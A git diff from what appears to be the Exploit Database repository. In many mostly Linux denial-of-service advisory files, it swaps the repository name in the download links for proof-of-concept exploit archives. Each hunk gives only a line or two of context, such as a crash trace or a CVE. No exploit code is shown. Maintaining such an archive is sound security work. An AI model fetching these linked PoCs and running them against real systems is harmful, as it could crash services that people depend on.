-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36633.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36633.zip \ No newline at end of file diff --git a/exploits/linux/dos/36669.txt b/exploits/linux/dos/36669.txt index 001dd1f7a..321af1351 100644 --- a/exploits/linux/dos/36669.txt +++ b/exploits/linux/dos/36669.txt @@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability. An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36669.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36669.zip \ No newline at end of file diff --git a/exploits/linux/dos/37839.txt b/exploits/linux/dos/37839.txt index 4aa0595e8..5a5427adb 100644 --- a/exploits/linux/dos/37839.txt +++ b/exploits/linux/dos/37839.txt @@ -60,4 +60,4 @@ In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CB See attached for a crash PoC for the latest Chrome/Flash on x64 linux. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37839.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37839.zip \ No newline at end of file diff --git a/exploits/linux/dos/37866.txt b/exploits/linux/dos/37866.txt index ad24028c5..37b849589 100644 --- a/exploits/linux/dos/37866.txt +++ b/exploits/linux/dos/37866.txt @@ -33,4 +33,4 @@ If we trace through the usages of %rax, we can get to some bad writes pretty eas 0x00007f69314b882f: mov %edx,0x10(%rdi) <---- rdi written to Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37866.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37866.zip \ No newline at end of file diff --git a/exploits/linux/dos/37867.txt b/exploits/linux/dos/37867.txt index 31b19ea82..5114d32be 100644 --- a/exploits/linux/dos/37867.txt +++ b/exploits/linux/dos/37867.txt @@ -18,4 +18,4 @@ rax 0x7ff8000000000000 9221120237041090560 And if we look back in the assembly a bit, the wild value has come from %rbx that points to a block of wild values. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37867.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37867.zip \ No newline at end of file diff --git a/exploits/linux/dos/37869.txt b/exploits/linux/dos/37869.txt index ff2770d47..d7d77f3b6 100644 --- a/exploits/linux/dos/37869.txt +++ b/exploits/linux/dos/37869.txt @@ -8,4 +8,4 @@ rcx 0x3102ffffecfd 53888954658045 The base sample from which this fuzz case was generated is also attached. We believe this may be related to button handling. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37869.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37869.zip \ No newline at end of file diff --git a/exploits/linux/dos/37870.txt b/exploits/linux/dos/37870.txt index fdc0e180c..3cae8913e 100644 --- a/exploits/linux/dos/37870.txt +++ b/exploits/linux/dos/37870.txt @@ -21,4 +21,4 @@ The wider context shows that the wild pointer target can be incremented with thi The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37870.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37870.zip \ No newline at end of file diff --git a/exploits/linux/dos/38620.txt b/exploits/linux/dos/38620.txt index 45f963a1a..6e7eac00e 100644 --- a/exploits/linux/dos/38620.txt +++ b/exploits/linux/dos/38620.txt @@ -79,4 +79,4 @@ The other crashes occur at freetype2/src/sfnt/ttcmap.c:3012:29. The issue was reported in https://savannah.nongnu.org/bugs/index.php?46346. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38620.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38620.zip \ No newline at end of file diff --git a/exploits/linux/dos/38778.txt b/exploits/linux/dos/38778.txt index 24cf2e59e..c4fd959ba 100644 --- a/exploits/linux/dos/38778.txt +++ b/exploits/linux/dos/38778.txt @@ -4,4 +4,4 @@ Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulne Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/thc-ssl-dos-1.4.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/thc-ssl-dos-1.4.tar.gz \ No newline at end of file diff --git a/exploits/linux/dos/39229.cpp b/exploits/linux/dos/39229.cpp index 9b9d18672..848fb86e2 100644 --- a/exploits/linux/dos/39229.cpp +++ b/exploits/linux/dos/39229.cpp @@ -54,7 +54,7 @@ using namespace std; * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED * * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2 - * https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39229.zip + * https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39229.zip * $ bzip2 -d CVE-2015-8396.dcm.bz2 * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm */ diff --git a/exploits/linux/dos/39454.txt b/exploits/linux/dos/39454.txt index d7bc20212..76abe4ed5 100644 --- a/exploits/linux/dos/39454.txt +++ b/exploits/linux/dos/39454.txt @@ -30,4 +30,4 @@ installation and use of the POC code. Proof of Concept: https://github.com/fjserna/CVE-2015-7547/archive/master.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39454-1.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39454-1.zip \ No newline at end of file diff --git a/exploits/linux/dos/39491.txt b/exploits/linux/dos/39491.txt index 7daaf97cf..dec920f25 100644 --- a/exploits/linux/dos/39491.txt +++ b/exploits/linux/dos/39491.txt @@ -78,4 +78,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39491.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39491.zip \ No newline at end of file diff --git a/exploits/linux/dos/39492.txt b/exploits/linux/dos/39492.txt index e9f192cfe..4e05f7520 100644 --- a/exploits/linux/dos/39492.txt +++ b/exploits/linux/dos/39492.txt @@ -81,4 +81,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39492.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39492.zip \ No newline at end of file diff --git a/exploits/linux/dos/39493.txt b/exploits/linux/dos/39493.txt index 2d1353832..37b3efe82 100644 --- a/exploits/linux/dos/39493.txt +++ b/exploits/linux/dos/39493.txt @@ -64,4 +64,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39493.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39493.zip \ No newline at end of file diff --git a/exploits/linux/dos/39494.txt b/exploits/linux/dos/39494.txt index 08968cfdd..ccb76edf9 100644 --- a/exploits/linux/dos/39494.txt +++ b/exploits/linux/dos/39494.txt @@ -74,4 +74,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39494.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39494.zip \ No newline at end of file diff --git a/exploits/linux/dos/39545.txt b/exploits/linux/dos/39545.txt index bf57db5c5..c87ce83bd 100644 --- a/exploits/linux/dos/39545.txt +++ b/exploits/linux/dos/39545.txt @@ -19,4 +19,4 @@ Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl! Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39545.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39545.zip \ No newline at end of file diff --git a/exploits/linux/dos/39638.txt b/exploits/linux/dos/39638.txt index ab05f8237..cd3eec947 100644 --- a/exploits/linux/dos/39638.txt +++ b/exploits/linux/dos/39638.txt @@ -69,4 +69,4 @@ Public Advisory: March 30th, 2016 Proof of Concept: https://census-labs.com/media/seas-trigger.packet -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39638.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39638.zip \ No newline at end of file diff --git a/exploits/linux/dos/39773.txt b/exploits/linux/dos/39773.txt index d3aeb9dcf..449475dc6 100644 --- a/exploits/linux/dos/39773.txt +++ b/exploits/linux/dos/39773.txt @@ -78,4 +78,4 @@ Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39773.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39773.zip \ No newline at end of file diff --git a/exploits/linux/dos/39940.txt b/exploits/linux/dos/39940.txt index 3603c9b3a..e58fb2bf5 100644 --- a/exploits/linux/dos/39940.txt +++ b/exploits/linux/dos/39940.txt @@ -101,4 +101,4 @@ Attached are six proof of concept PDF files: three derived from an original file Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39940.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39940.zip \ No newline at end of file diff --git a/exploits/linux/dos/39941.txt b/exploits/linux/dos/39941.txt index a9f926300..cea5846d3 100644 --- a/exploits/linux/dos/39941.txt +++ b/exploits/linux/dos/39941.txt @@ -109,4 +109,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39941.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39941.zip \ No newline at end of file diff --git a/exploits/linux/dos/39942.txt b/exploits/linux/dos/39942.txt index 38113323d..374d38b72 100644 --- a/exploits/linux/dos/39942.txt +++ b/exploits/linux/dos/39942.txt @@ -115,4 +115,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39942.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39942.zip \ No newline at end of file diff --git a/exploits/linux/dos/39943.txt b/exploits/linux/dos/39943.txt index 0bb076816..4c89ac0d3 100644 --- a/exploits/linux/dos/39943.txt +++ b/exploits/linux/dos/39943.txt @@ -119,4 +119,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39943.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39943.zip \ No newline at end of file diff --git a/exploits/linux/dos/39944.txt b/exploits/linux/dos/39944.txt index 6ad6b819e..b5e5d9dbc 100644 --- a/exploits/linux/dos/39944.txt +++ b/exploits/linux/dos/39944.txt @@ -154,4 +154,4 @@ Attached are three further files which reproduce the crash (note that MALLOC_CHE Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39944.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39944.zip \ No newline at end of file diff --git a/exploits/linux/dos/39961.txt b/exploits/linux/dos/39961.txt index 102036e5e..183c75f6c 100644 --- a/exploits/linux/dos/39961.txt +++ b/exploits/linux/dos/39961.txt @@ -161,4 +161,4 @@ Updated POC to work on the latest asan linux build, command buffer ids were out Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39961.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39961.zip \ No newline at end of file diff --git a/exploits/linux/dos/40291.txt b/exploits/linux/dos/40291.txt index 3c6821a32..dd3c876db 100644 --- a/exploits/linux/dos/40291.txt +++ b/exploits/linux/dos/40291.txt @@ -6,7 +6,7 @@ # CVE: CVE-2016-6855 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40291.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40291.zip Reported: 19-August-2016 diff --git a/exploits/linux/dos/42138.txt b/exploits/linux/dos/42138.txt index 1b451a93f..8a358ee8a 100644 --- a/exploits/linux/dos/42138.txt +++ b/exploits/linux/dos/42138.txt @@ -42,4 +42,4 @@ SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42138.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42138.zip \ No newline at end of file diff --git a/exploits/linux/dos/42139.txt b/exploits/linux/dos/42139.txt index 701b23764..e10f783ee 100644 --- a/exploits/linux/dos/42139.txt +++ b/exploits/linux/dos/42139.txt @@ -97,4 +97,4 @@ https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overfl Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42139.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42139.zip \ No newline at end of file diff --git a/exploits/linux/dos/42147.txt b/exploits/linux/dos/42147.txt index 3d6e9aa0f..268644613 100644 --- a/exploits/linux/dos/42147.txt +++ b/exploits/linux/dos/42147.txt @@ -66,4 +66,4 @@ qflb.wu () dbappsecurity com cn Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42147.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42147.zip \ No newline at end of file diff --git a/exploits/linux/dos/42148.txt b/exploits/linux/dos/42148.txt index 21103af00..4a801b328 100644 --- a/exploits/linux/dos/42148.txt +++ b/exploits/linux/dos/42148.txt @@ -394,4 +394,4 @@ qflb.wu () dbappsecurity com cn Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42148.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42148.zip \ No newline at end of file diff --git a/exploits/linux/dos/42162.txt b/exploits/linux/dos/42162.txt index c16c51481..a3095961e 100644 --- a/exploits/linux/dos/42162.txt +++ b/exploits/linux/dos/42162.txt @@ -34,4 +34,4 @@ Thread T1 (typefind:sink) created by T0 here: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42162.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42162.zip \ No newline at end of file diff --git a/exploits/linux/dos/42198.txt b/exploits/linux/dos/42198.txt index 6fe4bb436..0517f90ce 100644 --- a/exploits/linux/dos/42198.txt +++ b/exploits/linux/dos/42198.txt @@ -40,4 +40,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42198.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42198.zip \ No newline at end of file diff --git a/exploits/linux/dos/42199.txt b/exploits/linux/dos/42199.txt index e362a1c94..96fa55e54 100644 --- a/exploits/linux/dos/42199.txt +++ b/exploits/linux/dos/42199.txt @@ -75,4 +75,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42199.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42199.zip \ No newline at end of file diff --git a/exploits/linux/dos/42200.txt b/exploits/linux/dos/42200.txt index fc1a427c4..86a79fcc7 100644 --- a/exploits/linux/dos/42200.txt +++ b/exploits/linux/dos/42200.txt @@ -38,4 +38,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42200.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42200.zip \ No newline at end of file diff --git a/exploits/linux/dos/42201.txt b/exploits/linux/dos/42201.txt index 0491a2be7..53965adc6 100644 --- a/exploits/linux/dos/42201.txt +++ b/exploits/linux/dos/42201.txt @@ -67,4 +67,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42201.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42201.zip \ No newline at end of file diff --git a/exploits/linux/dos/42202.txt b/exploits/linux/dos/42202.txt index 2b1ef11ee..721eab996 100644 --- a/exploits/linux/dos/42202.txt +++ b/exploits/linux/dos/42202.txt @@ -34,4 +34,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42202.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42202.zip \ No newline at end of file diff --git a/exploits/linux/dos/42203.txt b/exploits/linux/dos/42203.txt index 39938ff41..e3fa9b50c 100644 --- a/exploits/linux/dos/42203.txt +++ b/exploits/linux/dos/42203.txt @@ -40,4 +40,4 @@ The command used was `objdump -D `. The compilation flags used were `-g -O Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42203.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42203.zip \ No newline at end of file diff --git a/exploits/linux/dos/42204.txt b/exploits/linux/dos/42204.txt index 86b9dd309..e67423fa9 100644 --- a/exploits/linux/dos/42204.txt +++ b/exploits/linux/dos/42204.txt @@ -41,4 +41,4 @@ Error in "aarch64_ext_ldst_reglist": global-buffer-overflow Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42204.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42204.zip \ No newline at end of file diff --git a/exploits/linux/dos/42207.txt b/exploits/linux/dos/42207.txt index 9a8887cf5..0331662cd 100644 --- a/exploits/linux/dos/42207.txt +++ b/exploits/linux/dos/42207.txt @@ -49,4 +49,4 @@ CVE-2017-9130 =============================== Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42207.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42207.zip \ No newline at end of file diff --git a/exploits/linux/dos/42258.txt b/exploits/linux/dos/42258.txt index 87075a0a2..f6da2119e 100644 --- a/exploits/linux/dos/42258.txt +++ b/exploits/linux/dos/42258.txt @@ -88,4 +88,4 @@ This bug was found with American Fuzzy Lop. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42258.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42258.zip \ No newline at end of file diff --git a/exploits/linux/dos/42259.txt b/exploits/linux/dos/42259.txt index 6fb0033b7..d35b59ac7 100644 --- a/exploits/linux/dos/42259.txt +++ b/exploits/linux/dos/42259.txt @@ -88,4 +88,4 @@ https://blogs.gentoo.org/ago/2017/06/17/lame-stack-based-buffer-overflow-in-iii_ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42259.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42259.zip \ No newline at end of file diff --git a/exploits/linux/dos/42299.txt b/exploits/linux/dos/42299.txt index 8598fe19e..245e5dea7 100644 --- a/exploits/linux/dos/42299.txt +++ b/exploits/linux/dos/42299.txt @@ -84,4 +84,4 @@ more info about the team, the tool or the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42299.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42299.zip \ No newline at end of file diff --git a/exploits/linux/dos/42300.txt b/exploits/linux/dos/42300.txt index 466138cf7..dea61bdac 100644 --- a/exploits/linux/dos/42300.txt +++ b/exploits/linux/dos/42300.txt @@ -39,4 +39,4 @@ info about the team, the tool or the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42300.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42300.zip \ No newline at end of file diff --git a/exploits/linux/dos/42301.txt b/exploits/linux/dos/42301.txt index 288ccf2da..428146a9f 100644 --- a/exploits/linux/dos/42301.txt +++ b/exploits/linux/dos/42301.txt @@ -88,4 +88,4 @@ Segmentation fault Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42301.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42301.zip \ No newline at end of file diff --git a/exploits/linux/dos/42386.txt b/exploits/linux/dos/42386.txt index 9c79064ef..9fe90a10d 100644 --- a/exploits/linux/dos/42386.txt +++ b/exploits/linux/dos/42386.txt @@ -13,4 +13,4 @@ Tested on the following configurations Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42386.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42386.zip \ No newline at end of file diff --git a/exploits/linux/dos/42389.txt b/exploits/linux/dos/42389.txt index de236b984..7507c8d81 100644 --- a/exploits/linux/dos/42389.txt +++ b/exploits/linux/dos/42389.txt @@ -207,4 +207,4 @@ CVE-2017-9260 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42389.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42389.zip \ No newline at end of file diff --git a/exploits/linux/dos/42390.txt b/exploits/linux/dos/42390.txt index a8e95376d..7db942c59 100644 --- a/exploits/linux/dos/42390.txt +++ b/exploits/linux/dos/42390.txt @@ -188,4 +188,4 @@ CVE-2017-9412 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42390.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42390.zip \ No newline at end of file diff --git a/exploits/linux/dos/42391.txt b/exploits/linux/dos/42391.txt index 937f0fa2a..f3ac88d9c 100644 --- a/exploits/linux/dos/42391.txt +++ b/exploits/linux/dos/42391.txt @@ -138,4 +138,4 @@ CVE-2017-9614 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42391.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42391.zip \ No newline at end of file diff --git a/exploits/linux/dos/42396.txt b/exploits/linux/dos/42396.txt index cc6e51cd0..e47f2d2ae 100644 --- a/exploits/linux/dos/42396.txt +++ b/exploits/linux/dos/42396.txt @@ -93,4 +93,4 @@ CVE-2017-11330 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42396.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42396.zip \ No newline at end of file diff --git a/exploits/linux/dos/42397.txt b/exploits/linux/dos/42397.txt index 7467e652b..abb51accb 100644 --- a/exploits/linux/dos/42397.txt +++ b/exploits/linux/dos/42397.txt @@ -62,4 +62,4 @@ CVE-2017-11331 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42397.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42397.zip \ No newline at end of file diff --git a/exploits/linux/dos/42398.txt b/exploits/linux/dos/42398.txt index e3682aa0a..029d32d0d 100644 --- a/exploits/linux/dos/42398.txt +++ b/exploits/linux/dos/42398.txt @@ -267,4 +267,4 @@ CVE-2017-11359 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42398.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42398.zip \ No newline at end of file diff --git a/exploits/linux/dos/42399.txt b/exploits/linux/dos/42399.txt index 17545127e..3281f9492 100644 --- a/exploits/linux/dos/42399.txt +++ b/exploits/linux/dos/42399.txt @@ -184,4 +184,4 @@ CVE-2017-11735 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42399.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42399.zip \ No newline at end of file diff --git a/exploits/linux/dos/42400.txt b/exploits/linux/dos/42400.txt index cbfed8f7b..33527586e 100644 --- a/exploits/linux/dos/42400.txt +++ b/exploits/linux/dos/42400.txt @@ -59,4 +59,4 @@ CVE-2017-11548 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42400.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42400.zip \ No newline at end of file diff --git a/exploits/linux/dos/42409.txt b/exploits/linux/dos/42409.txt index 425badc22..0d30aa4a9 100644 --- a/exploits/linux/dos/42409.txt +++ b/exploits/linux/dos/42409.txt @@ -57,4 +57,4 @@ CVE-2017-11552 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42409.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42409.zip \ No newline at end of file diff --git a/exploits/linux/dos/42433.txt b/exploits/linux/dos/42433.txt index e619139cf..00cf30ec6 100644 --- a/exploits/linux/dos/42433.txt +++ b/exploits/linux/dos/42433.txt @@ -352,4 +352,4 @@ https://github.com/Mindwerks/wildmidi/commit/660b513d99bced8783a4a5984ac2f742c74 POC: ========== https://github.com/Mindwerks/wildmidi/files/1186857/poc.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42433.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42433.zip \ No newline at end of file diff --git a/exploits/linux/dos/42546.txt b/exploits/linux/dos/42546.txt index 753f0a915..4c07f89f1 100644 --- a/exploits/linux/dos/42546.txt +++ b/exploits/linux/dos/42546.txt @@ -584,4 +584,4 @@ CVE-2017-12954 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42546.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42546.zip \ No newline at end of file diff --git a/exploits/linux/dos/42600.txt b/exploits/linux/dos/42600.txt index bb448edd2..18c9cddaa 100644 --- a/exploits/linux/dos/42600.txt +++ b/exploits/linux/dos/42600.txt @@ -83,4 +83,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42600.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42600.zip \ No newline at end of file diff --git a/exploits/linux/dos/42970.txt b/exploits/linux/dos/42970.txt index bc6c5dacd..a99186b6b 100644 --- a/exploits/linux/dos/42970.txt +++ b/exploits/linux/dos/42970.txt @@ -91,7 +91,7 @@ CVE-2017-14939 Reproducer: https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42970.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42970.zip Timeline: 2017-09-21: bug discovered and reported to upstream @@ -109,4 +109,4 @@ https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42970.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42970.zip \ No newline at end of file diff --git a/exploits/linux/dos/43014.txt b/exploits/linux/dos/43014.txt index 07f9bf457..47c885072 100644 --- a/exploits/linux/dos/43014.txt +++ b/exploits/linux/dos/43014.txt @@ -283,4 +283,4 @@ which would mean that this is a potentially exploitable issue in release builds. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43014.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43014.zip \ No newline at end of file diff --git a/exploits/linux/dos/43322.txt b/exploits/linux/dos/43322.txt index f1250cd49..94786fae6 100644 --- a/exploits/linux/dos/43322.txt +++ b/exploits/linux/dos/43322.txt @@ -388,4 +388,4 @@ Program terminated with signal SIGSEGV, Segmentation fault. Proof of Concept: 